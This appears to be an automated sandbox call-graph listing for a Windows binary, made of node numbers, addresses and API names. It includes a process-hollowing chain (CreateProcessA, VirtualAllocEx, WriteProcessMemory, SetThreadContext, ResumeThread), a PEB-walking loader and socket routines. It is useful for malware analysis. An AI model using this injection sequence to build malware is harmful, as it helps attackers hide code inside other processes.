RegCloseKey 70552->70557 70553 1000721b 735 API calls 70558 100057f3 Sleep 70553->70558 70559 100055a5 70554->70559 70555->70543 70556->70557 70557->70560 70585 10002d10 70558->70585 70559->70555 70560->70553 70562 100067ff 77 API calls 70561->70562 70564 100056b1 70562->70564 70563 100056e6 collate 70563->70513 70564->70563 70581 100060df 70564->70581 70568 10006bad 70567->70568 70571 10007d77 __ctrlfp __floor_pentium4 70567->70571 70569 10006bde 70568->70569 70568->70571 70576 10006c28 70569->70576 70578 10007a9b 67 API calls __lseeki64_nolock 70569->70578 70570 10007de5 __floor_pentium4 70575 10007dd2 __ctrlfp 70570->70575 70580 1000bc80 67 API calls 6 library calls 70570->70580 70571->70570 70574 10007dc2 70571->70574 70571->70575 70579 1000bc2b 66 API calls 3 library calls 70574->70579 70575->70522 70576->70522 70578->70576 70579->70575 70580->70575 70582 100060e5 70581->70582 70583 100011b0 70 API calls 70582->70583 70584 1001fab1 GetCurrentThreadId 70583->70584 70586 10002d70 70585->70586 70587 10002d21 setsockopt CancelIo InterlockedExchange closesocket SetEvent 70585->70587 70586->70537 70587->70586 70589 1000584e _memset 70588->70589 70590 100058a2 GetSystemDirectoryA 70589->70590 70615 100059e0 95 API calls _vswprintf_s 70590->70615 70592 100058d6 GetFileAttributesA 70593 1000590b CreateProcessA 70592->70593 70594 100058eb 70592->70594 70596 10005940 VirtualAllocEx 70593->70596 70597 10005932 70593->70597 70616 100059e0 95 API calls _vswprintf_s 70594->70616 70600 1000595a WriteProcessMemory 70596->70600 70601 100059ac 70596->70601 70599 10006815 __NMSG_WRITE 5 API calls 70597->70599 70598 10005908 70598->70593 70602 1000593c 70599->70602 70600->70601 70603 10005972 GetThreadContext 70600->70603 70604 10006815 __NMSG_WRITE 5 API calls 70601->70604 70602->70480 70603->70601 70605 10005991 SetThreadContext 70603->70605 70606 100059b9 70604->70606 70605->70601 70607 100059bd ResumeThread 70605->70607 70606->70480 70608 10006815 __NMSG_WRITE 5 API calls 70607->70608 70609 100059d7 70608->70609 70609->70480 70617 36700cd GetPEB 70610->70617 70613 36704e0 70613->70439 70614 36704a8 70614->70613 70619 36701cb 70614->70619 70615->70592 70616->70598 70618 36700e5 70617->70618 70618->70614 70620 36701df 70619->70620 70621 36701e6 70619->70621 70620->70613 70621->70620 70622 367021e VirtualAlloc 70621->70622 70622->70620 70625 3670238 70622->70625 70623 36703a3 70623->70620 70627 38011f2 70623->70627 70624 3670330 LoadLibraryA 70624->70620 70624->70625 70625->70623 70625->70624 70628 3801202 70627->70628 70629 38011fd 70627->70629 70633 38010fc 70628->70633 70645 3808262 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 70629->70645 70632 3801210 70632->70620 70634 3801108 ___DllMainCRTStartup 70633->70634 70635 3801155 70634->70635 70638 38011a5 ___DllMainCRTStartup 70634->70638 70646 3800f98 70634->70646 70635->70638 70697 37fe480 70635->70697 70638->70632 70640 37fe480 ___DllMainCRTStartup 520 API calls 70642 380117c 70640->70642 70641 3800f98 __CRT_INIT@12 148 API calls 70641->70638 70644 3801185 70644->70638 70644->70641 70645->70628 70647 3800fa4 ___DllMainCRTStartup 70646->70647 70648 3801026 70647->70648 70649 3800fac 70647->70649 70651 3801087 70648->70651 70652 380102c 70648->70652 70701 3801a1b HeapCreate 70649->70701 70653 38010e5 70651->70653 70654 380108c 70651->70654 70657 380104a 70652->70657 70664 3800fb5 ___DllMainCRTStartup 70652->70664 70726 3801ce6 63 API calls _doexit 70652->70726 70653->70664 70655 3800fb1 70655->70664 70664->70635 70698 37fe4af 70697->70698 70699 37fe489 70697->70699 70698->70640 70698->70644 70699->70698 70700 37fe491 CreateThread WaitForSingleObject 70699->70700 70700->70698 70760 37fdf10 70700->70760 70701->70655 70726->70657 70804->70505 70805->70262 70806 6ca92a4b 70857 6ca9aa0e 70806->70857 70808 6ca92a5b _Yarn 70868 6ca91070 70808->70868 70810 6ca92b08 Sleep 70821 6ca92b23 _Yarn _strlen 70810->70821 70811 6ca94d58 70901 6caa3a5e 70811->70901 70812 6ca92ac1 std::ios_base::_Ios_base_dtor 70812->70810 70812->70811 70816 6ca94d75 70906 6ca826c0 30 API calls 3 library calls 70816->70906 70820 6ca94d81 70907 6ca826c0 30 API calls 3 library calls 70820->70907 70821->70816 70824 6ca9aa0e 3 API calls 70821->70824 70823 6ca94d8d 70908 6ca826c0 30 API calls 3 library calls 70823->70908 70830 6ca92c36 70824->70830 70826 6ca94d99 70909 6ca826c0 30 API calls 3 library calls 70826->70909 70828 6ca94da5 70910 6ca826c0 30 API calls 3 library calls 70828->70910 70830->70820 70880 6ca90d50 70830->70880 70831 6ca94db1 70911 6ca826c0 30 API calls 3 library calls 70831->70911 70833 6ca94dbd 70912 6ca826c0 30 API calls 3 library calls 70833->70912 70836 6ca94dc9 70913 6ca826c0 30 API calls 3 library calls 70836->70913 70838 6ca94dd5 70839 6ca92d71 std::ios_base::_Ios_base_dtor _Yarn _strlen 70839->70811 70839->70823 70840 6ca9aa0e 3 API calls 70839->70840 70841 6ca92f73 70840->70841 70841->70826 70842 6ca90d50 131 API calls 70841->70842 70843 6ca9309a std::ios_base::_Ios_base_dtor 70842->70843 70843->70811 70843->70828 70844 6ca93267 70843->70844 70845 6ca93297 70843->70845 70846 6ca9aa0e 3 API calls 70844->70846 70847 6ca9aa0e 3 API calls 70845->70847 70848 6ca9327a std::ios_base::_Ios_base_dtor _Yarn _strlen 70846->70848 70847->70848 70848->70811 70848->70831 70849 6ca91070 131 API calls 70848->70849 70852 6ca93daa std::ios_base::_Ios_base_dtor 70849->70852 70850 6ca93df7 Sleep 70851 6ca9aa0e 3 API calls 70850->70851 70853 6ca93e2e 70851->70853 70852->70811 70852->70850 70899 6ca95e30 30 API calls 2 library calls 70853->70899 70855 6ca93eba 70855->70811 70900 6ca8b390 30 API calls 2 library calls 70855->70900 70859 6ca9aa13 ___std_exception_copy 70857->70859 70858 6ca9aa2d 70858->70808 70859->70858 70861 6ca9aa2f 70859->70861 70914 6caa24cf EnterCriticalSection LeaveCriticalSection __Getctype 70859->70914 70862 6ca9c2f8 70861->70862 70863 6ca9aa39 Concurrency::cancel_current_task 70861->70863 70916 6ca9d2b3 RaiseException 70862->70916 70915 6ca9d2b3 RaiseException 70863->70915 70866 6ca9c314 70867 6ca9b51c 70869 6ca91076 70868->70869 70917 6ca8b880 70869->70917 70871 6ca910d5 70872 6ca9112f 70871->70872 70936 6ca911c0 70871->70936 70962 6ca8a100 70872->70962 70874 6ca9114d std::ios_base::_Ios_base_dtor 70874->70812 70886 6ca90d94 70880->70886 70881 6ca90e2c 70881->70839 70882 6ca91035 71514 6ca85880 70882->71514 70885 6ca90e70 70892 6ca90e7c _Yarn 70885->70892 71517 6ca95c90 30 API calls 2 library calls 70885->71517 70886->70881 70886->70882 70886->70885 70892->70839 70899->70855 70900->70855 71519 6caa3c9d 29 API calls ___std_exception_copy 70901->71519 70903 6caa3a6d 71520 6caa3a7b 11 API calls CallUnexpected 70903->71520 70905 6caa3a7a 70906->70820 70907->70823 70908->70826 70909->70828 70910->70831 70911->70833 70912->70836 70913->70838 70914->70859 70915->70867 70916->70866 70918 6ca8b8b5 70917->70918 70968 6ca8bd70 70918->70968 70920 6ca8b951 70921 6ca9aa0e 3 API calls 70920->70921 70922 6ca8b989 70921->70922 70985 6ca9b2cf 70922->70985 70924 6ca8b99d 70997 6ca8bb60 70924->70997 70927 6ca8ba92 70927->70871 70929 6ca8bad1 71006 6ca826d0 30 API calls 3 library calls 70929->71006 70931 6ca8bae3 71007 6ca9d2b3 RaiseException 70931->71007 70933 6ca8baf8 70934 6ca8a100 72 API calls 70933->70934 70935 6ca8bb0f 70934->70935 70935->70871 70937 6ca911ff 70936->70937 70943 6ca91213 70937->70943 71403 6ca82060 39 API calls CallUnexpected 70937->71403 70941 6ca9110f 70946 6ca898c0 70941->70946 70942 6ca912d9 70942->70941 71404 6ca82d90 39 API calls CallUnexpected 70942->71404 70943->70942 71405 6ca82300 38 API calls 70943->71405 71406 6ca826d0 30 API calls 3 library calls 70943->71406 71407 6ca9d2b3 RaiseException 70943->71407 70947 6ca898d9 70946->70947 70948 6ca89909 70946->70948 71408 6ca8b030 70947->71408 70950 6ca899cd 70948->70950 70952 6ca899df 70948->70952 71414 6ca9aa82 70950->71414 71421 6ca82300 38 API calls 70952->71421 70954 6caa4007 69 API calls 70954->70948 70955 6ca899d8 SetFileAttributesA 70955->70872 70957 6ca89a07 71422 6ca82370 30 API calls 70957->71422 70959 6ca89a17 71423 6ca9d2b3 RaiseException 70959->71423 70961 6ca89a22 70963 6ca8a13b 70962->70963 70964 6ca8a193 70963->70964 70965 6ca8b030 69 API calls 70963->70965 70964->70874 70966 6ca8a188 70965->70966 70967 6caa4007 69 API calls 70966->70967 70967->70964 70969 6ca9aa0e 3 API calls 70968->70969 70970 6ca8bdce 70969->70970 70971 6ca9b2cf 44 API calls 70970->70971 70972 6ca8bde2 70971->70972 71008 6ca84ca0 67 API calls 3 library calls 70972->71008 70974 6ca8be18 70975 6ca8be64 70974->70975 70976 6ca8be8d 70974->70976 70979 6ca8be77 70975->70979 71009 6ca9af37 9 API calls 2 library calls 70975->71009 71010 6ca82300 38 API calls 70976->71010 70979->70920 70980 6ca8beb7 71011 6ca82370 30 API calls 70980->71011 70982 6ca8becd 71012 6ca9d2b3 RaiseException 70982->71012 70984 6ca8bed8 70984->70920 70986 6ca9b2db __EH_prolog3 70985->70986 71013 6ca9ae5e 70986->71013 70990 6ca9b2f9 71027 6ca9b362 41 API calls std::locale::_Setgloballocale 70990->71027 70992 6ca9b354 __DllMainCRTStartup@12 70992->70924 70994 6ca9b301 71028 6ca9b159 14 API calls 2 library calls 70994->71028 70996 6ca9b317 71019 6ca9ae8f 70996->71019 70998 6ca8bbac 70997->70998 71004 6ca8ba46 70997->71004 71033 6ca9b3ef 70998->71033 71002 6ca8bc52 71042 6ca8b4e0 67 API calls 2 library calls 71002->71042 71004->70927 71005 6ca82300 38 API calls 71004->71005 71005->70929 71006->70931 71007->70933 71008->70974 71009->70979 71010->70980 71011->70982 71012->70984 71014 6ca9ae6d 71013->71014 71015 6ca9ae74 71013->71015 71029 6caa3d74 6 API calls std::_Lockit::_Lockit 71014->71029 71017 6ca9ae72 71015->71017 71030 6ca9c9db EnterCriticalSection 71015->71030 71017->70996 71026 6ca9b1d8 15 API calls std::locale::_Locimp::_Locimp 71017->71026 71020 6ca9ae99 71019->71020 71021 6caa3d82 71019->71021 71025 6ca9aeac 71020->71025 71031 6ca9c9e9 LeaveCriticalSection 71020->71031 71032 6caa3d5d LeaveCriticalSection 71021->71032 71023 6caa3d89 71023->70992 71025->70992 71026->70990 71027->70994 71028->70996 71029->71017 71030->71017 71031->71025 71032->71023 71034 6ca9b3f8 71033->71034 71037 6ca8bbba 71034->71037 71043 6caa3311 71034->71043 71037->71004 71041 6caa0063 29 API calls 2 library calls 71037->71041 71039 6ca9b467 71039->71037 71066 6caa4007 71039->71066 71041->71002 71042->71004 71046 6caa331c ___scrt_is_nonwritable_in_current_image 71043->71046 71044 6caa332f 71084 6caa2f04 14 API calls __dosmaperr 71044->71084 71046->71044 71048 6caa334f 71046->71048 71047 6caa3334 71085 6caa3a4e 29 API calls ___std_exception_copy 71047->71085 71050 6caa3361 71048->71050 71051 6caa3354 71048->71051 71070 6cab0537 71050->71070 71086 6caa2f04 14 API calls __dosmaperr 71051->71086 71055 6caa337e 71078 6cab069d 71055->71078 71056 6caa3371 71087 6caa2f04 14 API calls __dosmaperr 71056->71087 71061 6ca9b44c 71061->71037 71062 6caa2fb4 71061->71062 71063 6caa2fc7 ___std_exception_copy 71062->71063 71227 6caa3267 71063->71227 71065 6caa2fdc ___std_exception_copy 71065->71039 71067 6caa401a ___std_exception_copy 71066->71067 71337 6caa40c5 71067->71337 71069 6caa4026 ___std_exception_copy 71069->71037 71071 6cab0543 ___scrt_is_nonwritable_in_current_image 71070->71071 71089 6caa3d46 EnterCriticalSection 71071->71089 71073 6cab0551 71090 6cab05db 71073->71090 71079 6cab07bc 71078->71079 71121 6cab083f 71079->71121 71083 6caa3393 71088 6caa33bc LeaveCriticalSection __fread_nolock 71083->71088 71084->71047 71085->71061 71086->71061 71087->71061 71088->71061 71089->71073 71091 6cab05fe 71090->71091 71092 6cab0656 71091->71092 71099 6cab055e 71091->71099 71106 6caa00a9 EnterCriticalSection 71091->71106 71107 6caa00bd LeaveCriticalSection 71091->71107 71108 6caacf6f 71092->71108 71097 6cab0668 71097->71099 71116 6caaca3e 6 API calls std::_Lockit::_Lockit 71097->71116 71103 6cab0597 71099->71103 71101 6cab0687 71117 6caa00a9 EnterCriticalSection 71101->71117 71120 6caa3d5d LeaveCriticalSection 71103->71120 71105 6caa336a 71105->71055 71105->71056 71106->71091 71107->71091 71114 6caacf7c __Getctype 71108->71114 71109 6caacfbc 71119 6caa2f04 14 API calls __dosmaperr 71109->71119 71110 6caacfa7 RtlAllocateHeap 71112 6caacfba 71110->71112 71110->71114 71115 6caaa607 14 API calls __dosmaperr 71112->71115 71114->71109 71114->71110 71118 6caa24cf EnterCriticalSection LeaveCriticalSection __Getctype 71114->71118 71115->71097 71116->71101 71117->71099 71118->71114 71119->71112 71120->71105 71122 6cab085e 71121->71122 71123 6cab0871 71122->71123 71131 6cab0886 71122->71131 71141 6caa2f04 14 API calls __dosmaperr 71123->71141 71125 6cab0876 71142 6caa3a4e 29 API calls ___std_exception_copy 71125->71142 71127 6cab07d2 71127->71083 71138 6cab9b59 71127->71138 71129 6cab0a57 71147 6caa3a4e 29 API calls ___std_exception_copy 71129->71147 71136 6cab09a6 71131->71136 71143 6cab9a21 39 API calls 2 library calls 71131->71143 71133 6cab09f6 71133->71136 71144 6cab9a21 39 API calls 2 library calls 71133->71144 71135 6cab0a14 71135->71136 71145 6cab9a21 39 API calls 2 library calls 71135->71145 71136->71127 71146 6caa2f04 14 API calls __dosmaperr 71136->71146 71148 6cab9f11 71138->71148 71141->71125 71142->71127 71143->71133 71144->71135 71145->71136 71146->71129 71147->71127 71150 6cab9f1d ___scrt_is_nonwritable_in_current_image 71148->71150 71149 6cab9f24 71168 6caa2f04 14 API calls __dosmaperr 71149->71168 71150->71149 71152 6cab9f4f 71150->71152 71159 6cab9b79 71152->71159 71153 6cab9f29 71169 6caa3a4e 29 API calls ___std_exception_copy 71153->71169 71158 6cab9b74 71158->71083 71171 6caa51ef 71159->71171 71164 6cab9baf 71166 6cab9be1 71164->71166 71226 6caaa607 14 API calls __dosmaperr 71164->71226 71170 6cab9fa6 LeaveCriticalSection __wsopen_s 71166->71170 71168->71153 71169->71158 71170->71158 71172 6ca9f6fa __wsopen_s 39 API calls 71171->71172 71173 6caa5201 71172->71173 71174 6caa5213 71173->71174 71175 6caac851 __wsopen_s 5 API calls 71173->71175 71176 6ca9f7f4 71174->71176 71175->71174 71177 6ca9f869 __wsopen_s 17 API calls 71176->71177 71178 6ca9f80c 71177->71178 71178->71164 71179 6cab9be7 71178->71179 71180 6caba081 __wsopen_s 29 API calls 71179->71180 71181 6cab9c04 71180->71181 71182 6cab9c19 71181->71182 71183 6cab9c32 71181->71183 71184 6caa2f17 __dosmaperr 14 API calls 71182->71184 71185 6cab6ded __wsopen_s 18 API calls 71183->71185 71203 6cab9c1e 71184->71203 71186 6cab9c37 71185->71186 71187 6cab9c40 71186->71187 71188 6cab9c57 71186->71188 71189 6caa2f17 __dosmaperr 14 API calls 71187->71189 71190 6cab9fec __wsopen_s CreateFileW 71188->71190 71192 6cab9c45 71189->71192 71199 6cab9c90 71190->71199 71191 6caa2f04 __dosmaperr 14 API calls 71217 6cab9c2b 71191->71217 71193 6caa2f04 __dosmaperr 14 API calls 71192->71193 71193->71203 71194 6cab9d0d GetFileType 71197 6cab9ce2 GetLastError 71199->71194 71199->71197 71202 6cab9fec __wsopen_s CreateFileW 71199->71202 71203->71191 71217->71164 71226->71166 71229 6caa3273 ___scrt_is_nonwritable_in_current_image 71227->71229 71228 6caa3279 71250 6caa3bf7 29 API calls 2 library calls 71228->71250 71229->71228 71231 6caa32bc 71229->71231 71238 6caa00a9 EnterCriticalSection 71231->71238 71233 6caa32c8 71239 6caa317b 71233->71239 71235 6caa32de 71251 6caa3307 LeaveCriticalSection __fread_nolock 71235->71251 71237 6caa3294 71237->71065 71238->71233 71240 6caa318e 71239->71240 71241 6caa31a1 71239->71241 71240->71235 71252 6caa30a2 71241->71252 71243 6caa31c4 71244 6caa3252 71243->71244 71245 6caa31df 71243->71245 71265 6caaff35 34 API calls 3 library calls 71243->71265 71244->71235 71256 6caa421d 71245->71256 71250->71237 71251->71237 71253 6caa30b3 71252->71253 71255 6caa310b 71252->71255 71253->71255 71266 6caafcdb 31 API calls 2 library calls 71253->71266 71255->71243 71257 6caa31f2 71256->71257 71258 6caa4236 71256->71258 71262 6caafd1b 71257->71262 71258->71257 71267 6caaf3a2 71258->71267 71260 6caa4252 71274 6cab1438 71260->71274 71318 6caafe7c 71262->71318 71264 6caafd34 71264->71244 71265->71245 71266->71255 71268 6caaf3ae 71267->71268 71269 6caaf3c3 71267->71269 71285 6caa2f04 14 API calls __dosmaperr 71268->71285 71269->71260 71271 6caaf3b3 71286 6caa3a4e 29 API calls ___std_exception_copy 71271->71286 71273 6caaf3be 71273->71260 71275 6cab1444 ___scrt_is_nonwritable_in_current_image 71274->71275 71276 6cab1485 71275->71276 71278 6cab14cb 71275->71278 71284 6cab144c 71275->71284 71316 6caa3bf7 29 API calls 2 library calls 71276->71316 71287 6cab7171 EnterCriticalSection 71278->71287 71280 6cab14d1 71281 6cab14ef 71280->71281 71288 6cab121c 71280->71288 71317 6cab1541 LeaveCriticalSection __wsopen_s 71281->71317 71284->71257 71285->71271 71286->71273 71287->71280 71289 6cab1244 71288->71289 71313 6cab1267 __wsopen_s 71288->71313 71290 6cab1248 71289->71290 71292 6cab12a3 71289->71292 71291 6caa3bf7 ___std_exception_copy 29 API calls 71290->71291 71291->71313 71293 6caafd1b __wsopen_s 31 API calls 71292->71293 71295 6cab12c1 71292->71295 71293->71295 71294 6cab1549 __wsopen_s 40 API calls 71296 6cab12d3 71294->71296 71295->71294 71297 6cab12d9 71296->71297 71298 6cab1320 71296->71298 71301 6cab1308 71297->71301 71302 6cab12e1 71297->71302 71299 6cab1389 WriteFile 71298->71299 71300 6cab1334 71298->71300 71305 6cab13ab GetLastError 71299->71305 71299->71313 71303 6cab133c 71300->71303 71304 6cab1375 71300->71304 71306 6cab15c6 __wsopen_s 45 API calls 71301->71306 71309 6cab198d __wsopen_s 6 API calls 71302->71309 71302->71313 71307 6cab1361 71303->71307 71308 6cab1341 71303->71308 71310 6cab19f5 __wsopen_s 7 API calls 71304->71310 71305->71313 71315 6cab131b 71306->71315 71312 6cab1bb9 __wsopen_s 8 API calls 71307->71312 71311 6cab134a 71308->71311 71308->71313 71309->71313 71310->71313 71314 6cab1ad0 __wsopen_s 7 API calls 71311->71314 71312->71315 71313->71281 71314->71313 71315->71313 71316->71284 71317->71284 71324 6cab6d83 71318->71324 71320 6caafe8e 71321 6caafeaa SetFilePointerEx 71320->71321 71323 6caafe96 __wsopen_s 71320->71323 71322 6caafec2 GetLastError 71321->71322 71321->71323 71322->71323 71323->71264 71325 6cab6d90 71324->71325 71326 6cab6da5 71324->71326 71327 6caa2f17 __dosmaperr 14 API calls 71325->71327 71328 6caa2f17 __dosmaperr 14 API calls 71326->71328 71332 6cab6dca 71326->71332 71329 6cab6d95 71327->71329 71330 6cab6dd5 71328->71330 71331 6caa2f04 __dosmaperr 14 API calls 71329->71331 71333 6caa2f04 __dosmaperr 14 API calls 71330->71333 71334 6cab6d9d 71331->71334 71332->71320 71335 6cab6ddd 71333->71335 71334->71320 71336 6caa3a4e ___std_exception_copy 29 API calls 71335->71336 71336->71334 71338 6caa40d1 ___scrt_is_nonwritable_in_current_image 71337->71338 71339 6caa40db 71338->71339 71340 6caa40fe 71338->71340 71363 6caa3bf7 29 API calls 2 library calls 71339->71363 71347 6caa40f6 71340->71347 71348 6caa00a9 EnterCriticalSection 71340->71348 71343 6caa411c 71349 6caa4037 71343->71349 71345 6caa4129 71364 6caa4154 LeaveCriticalSection __fread_nolock 71345->71364 71347->71069 71348->71343 71350 6caa4067 71349->71350 71351 6caa4044 71349->71351 71353 6caa405f 71350->71353 71354 6caa421d ___scrt_uninitialize_crt 64 API calls 71350->71354 71376 6caa3bf7 29 API calls 2 library calls 71351->71376 71353->71345 71355 6caa407f 71354->71355 71365 6caae56c 71355->71365 71358 6caaf3a2 __fread_nolock 29 API calls 71359 6caa4093 71358->71359 71369 6cab0f92 71359->71369 71363->71347 71364->71347 71366 6caa4087 71365->71366 71367 6caae583 71365->71367 71366->71358 71367->71366 71378 6caaa607 14 API calls __dosmaperr 71367->71378 71370 6caa409a 71369->71370 71372 6cab0fbb 71369->71372 71370->71353 71377 6caaa607 14 API calls __dosmaperr 71370->71377 71371 6cab100a 71387 6caa3bf7 29 API calls 2 library calls 71371->71387 71372->71371 71374 6cab0fe2 71372->71374 71379 6cab1035 71374->71379 71376->71353 71377->71353 71378->71366 71380 6cab1041 ___scrt_is_nonwritable_in_current_image 71379->71380 71388 6cab7171 EnterCriticalSection 71380->71388 71382 6cab104f 71383 6cab1080 71382->71383 71389 6cab0ef2 71382->71389 71402 6cab10ba LeaveCriticalSection __wsopen_s 71383->71402 71386 6cab10a3 71386->71370 71387->71370 71388->71382 71390 6cab6d83 __wsopen_s 29 API calls 71389->71390 71393 6cab0f02 71390->71393 71391 6cab0f08 71392 6cab6f00 __wsopen_s 15 API calls 71391->71392 71401 6cab0f60 __wsopen_s 71392->71401 71393->71391 71394 6cab0f3a 71393->71394 71396 6cab6d83 __wsopen_s 29 API calls 71393->71396 71394->71391 71395 6cab6d83 __wsopen_s 29 API calls 71394->71395 71398 6cab0f46 CloseHandle 71395->71398 71397 6cab0f31 71396->71397 71399 6cab6d83 __wsopen_s 29 API calls 71397->71399 71398->71391 71400 6cab0f52 GetLastError 71398->71400 71399->71394 71400->71391 71401->71383 71402->71386 71403->70943 71404->70941 71405->70943 71406->70943 71407->70943 71409 6ca8b09e 71408->71409 71412 6ca8b04a 71408->71412 71410 6ca9aa82 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 71409->71410 71411 6ca898ff 71410->71411 71411->70954 71412->71409 71424 6caa4c68 71412->71424 71415 6ca9aa8b IsProcessorFeaturePresent 71414->71415 71416 6ca9aa8a 71414->71416 71418 6ca9c407 71415->71418 71416->70955 71513 6ca9c4ed SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 71418->71513 71420 6ca9c4ea 71420->70955 71421->70957 71422->70959 71423->70961 71425 6caa4c7b ___std_exception_copy 71424->71425 71428 6caa4e49 71425->71428 71427 6caa4c90 ___std_exception_copy 71427->71409 71429 6caa4e7f 71428->71429 71430 6caa4e57 71428->71430 71429->71427 71430->71429 71431 6caa4e86 71430->71431 71432 6caa4e64 71430->71432 71436 6caa4f0c 71431->71436 71444 6caa3bf7 29 API calls 2 library calls 71432->71444 71437 6caa4f18 ___scrt_is_nonwritable_in_current_image 71436->71437 71445 6caa00a9 EnterCriticalSection 71437->71445 71439 6caa4f26 71446 6caa4ec0 71439->71446 71443 6caa4ebe 71443->71427 71444->71429 71445->71439 71454 6caae39a 71446->71454 71452 6caa4f02 71453 6caa4f5b LeaveCriticalSection __fread_nolock 71452->71453 71453->71443 71474 6caae445 71454->71474 71456 6caae3ab 71457 6caae3fa 71456->71457 71458 6caa4ed8 71456->71458 71481 6caaa641 15 API calls 2 library calls 71457->71481 71463 6caa4ca2 71458->71463 71460 6caae404 71482 6caaa607 14 API calls __dosmaperr 71460->71482 71462 6caae40d 71462->71458 71465 6caa4cb4 71463->71465 71468 6caa4cdd 71463->71468 71464 6caa4cc2 71505 6caa3bf7 29 API calls 2 library calls 71464->71505 71465->71464 71465->71468 71471 6caa4cf8 _Yarn 71465->71471 71473 6caae483 64 API calls ___scrt_uninitialize_crt 71468->71473 71469 6caa421d ___scrt_uninitialize_crt 64 API calls 71469->71471 71470 6caaf3a2 __fread_nolock 29 API calls 71470->71471 71471->71468 71471->71469 71471->71470 71472 6cab1438 __wsopen_s 64 API calls 71471->71472 71492 6cab1e85 71471->71492 71472->71471 71473->71452 71476 6caae451 71474->71476 71475 6caae47b 71475->71456 71476->71475 71477 6caaf3a2 __fread_nolock 29 API calls 71476->71477 71478 6caae46c 71477->71478 71483 6cab71c6 71478->71483 71480 6caae472 71480->71456 71481->71460 71482->71462 71484 6cab71d3 71483->71484 71485 6cab71e0 71483->71485 71486 6caa2f04 __dosmaperr 14 API calls 71484->71486 71488 6cab71ec 71485->71488 71489 6caa2f04 __dosmaperr 14 API calls 71485->71489 71487 6cab71d8 71486->71487 71487->71480 71488->71480 71490 6cab720d 71489->71490 71491 6caa3a4e ___std_exception_copy 29 API calls 71490->71491 71491->71487 71493 6cab1f15 71492->71493 71494 6caaf3a2 __fread_nolock 29 API calls 71493->71494 71497 6cab1f22 71494->71497 71495 6cab1f2e 71495->71471 71496 6cab1f7a 71496->71495 71498 6cab1fdc 71496->71498 71500 6caae445 29 API calls 71496->71500 71497->71495 71497->71496 71511 6cab1e90 31 API calls __wsopen_s 71497->71511 71512 6cab200b 64 API calls 2 library calls 71498->71512 71502 6cab1fcf 71500->71502 71502->71498 71506 6cab3cff 71502->71506 71503 6cab1fed 71503->71471 71505->71468 71507 6caacf6f __Getctype 14 API calls 71506->71507 71508 6cab3d1c 71507->71508 71509 6caaa607 ___free_lconv_mon 14 API calls 71508->71509 71510 6cab3d26 71509->71510 71510->71498 71511->71496 71512->71503 71513->71420 71518 6ca9b53d 30 API calls 2 library calls 71514->71518 71517->70892 71519->70903 71520->70905 71521 6caafc2e 71522 6caafc3b 71521->71522 71524 6caafc56 71521->71524 71523 6caafc47 71522->71523 71522->71524 71543 6caa2f04 14 API calls __dosmaperr 71523->71543 71525 6caafc65 71524->71525 71544 6cab92f4 30 API calls 2 library calls 71524->71544 71530 6cab3515 71525->71530 71529 6caafc4c __fread_nolock 71531 6cab352d 71530->71531 71532 6cab3522 71530->71532 71533 6cab3535 71531->71533 71541 6cab353e __Getctype 71531->71541 71545 6caaa641 15 API calls 2 library calls 71532->71545 71546 6caaa607 14 API calls __dosmaperr 71533->71546 71535 6cab352a 71539 6cab353b 71535->71539 71537 6cab3568 RtlReAllocateHeap 71537->71539 71537->71541 71538 6cab3543 71547 6caa2f04 14 API calls __dosmaperr 71538->71547 71539->71529 71541->71537 71541->71538 71548 6caa24cf EnterCriticalSection LeaveCriticalSection __Getctype 71541->71548 71543->71529 71544->71525 71545->71535 71546->71539 71547->71539 71548->71541 71549 1001f927 71550 1001fb9a 71549->71550 71554 100060df 71 API calls 71550->71554 71555 10005ef8 71550->71555 71559 1001f997 71550->71559 71551 1001fb9c 71554->71551 71556 10005f68 71555->71556 71557 10001100 70 API calls 71556->71557 71558 1001f9b7 71556->71558 71557->71556 71561 10005f68 71559->71561 71560 1001f9b7 71561->71560 71562 10001100 70 API calls 71561->71562 71562->71561 71563 1000638b 71564 10001100 70 API calls 71563->71564 71565 10006390 71564->71565 71566 1000474c lstrlenW 71567 1001fff8 71566->71567 71568 6e10e0 71569 6e10ec ___scrt_is_nonwritable_in_current_image 71568->71569 71592 6e12dc IsProcessorFeaturePresent ___scrt_uninitialize_crt 71569->71592 71571 6e10f3 71572 6e1246 71571->71572 71575 6e111d 71571->71575 71607 6e15d0 6 API calls 71572->71607 71574 6e124d exit 71576 6e1253 _exit 71574->71576 71577 6e1121 _initterm_e 71575->71577 71581 6e116a ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 71575->71581 71578 6e113c 71577->71578 71579 6e114d _initterm 71577->71579 71579->71581 71580 6e11be 71593 6e16eb memset GetStartupInfoW 71580->71593 71581->71580 71584 6e11b6 _register_thread_local_exe_atexit_callback 71581->71584 71583 6e11c3 _get_narrow_winmain_command_line 71594 6e1c50 GetCommandLineW CommandLineToArgvW 71583->71594 71584->71580 71586 6e11d8 71606 6e1721 GetModuleHandleW 71586->71606 71588 6e11df 71588->71574 71589 6e11e3 71588->71589 71590 6e11ec ___scrt_uninitialize_crt 71589->71590 71591 6e11e7 _cexit 71589->71591 71590->71578 71591->71590 71592->71571 71593->71583 71595 6e1c78 71594->71595 71596 6e1c82 71594->71596 71595->71586 71608 6e1d6f 71596->71608 71598 6e1ca0 71599 6e1d1c LocalFree 71598->71599 71600 6e1cc1 WideCharToMultiByte 71598->71600 71618 6e1000 TCGamerUpdateMain 71599->71618 71602 6e1d6f 4 API calls 71600->71602 71603 6e1ce1 WideCharToMultiByte 71602->71603 71603->71600 71604 6e1d14 71603->71604 71604->71599 71605 6e1d35 71605->71586 71606->71588 71607->71574 71609 6e1d7d 71608->71609 71610 6e1d8f malloc 71609->71610 71611 6e1d9c 71610->71611 71612 6e1d82 _callnewh 71610->71612 71611->71598 71612->71610 71614 6e1d9e 71612->71614 71613 6e1e9f 71615 6e1ead _CxxThrowException 71613->71615 71614->71613 71616 6e1e90 _CxxThrowException 71614->71616 71617 6e1ec3 71615->71617 71616->71613 71617->71598 71618->71605 71619 6ca988b9 Sleep 71629 6ca987d0 std::ios_base::_Ios_base_dtor _Yarn _strlen 71619->71629 71620 6ca988f2 _strlen 71624 6ca98925 71620->71624 71651 6ca826c0 30 API calls 3 library calls 71620->71651 71622 6ca9aa0e RaiseException EnterCriticalSection LeaveCriticalSection 71622->71629 71625 6ca98980 71624->71625 71626 6ca98962 71624->71626 71630 6ca9892c 